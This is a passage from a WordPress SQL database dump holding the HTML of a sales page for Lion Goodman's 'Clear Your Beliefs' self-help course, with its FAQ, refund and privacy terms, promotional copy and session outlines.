purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 17:00:41', '2014-06-17 22:00:41', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(946, 4194, '2014-06-17 16:58:18', '2014-06-17 21:58:18', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" 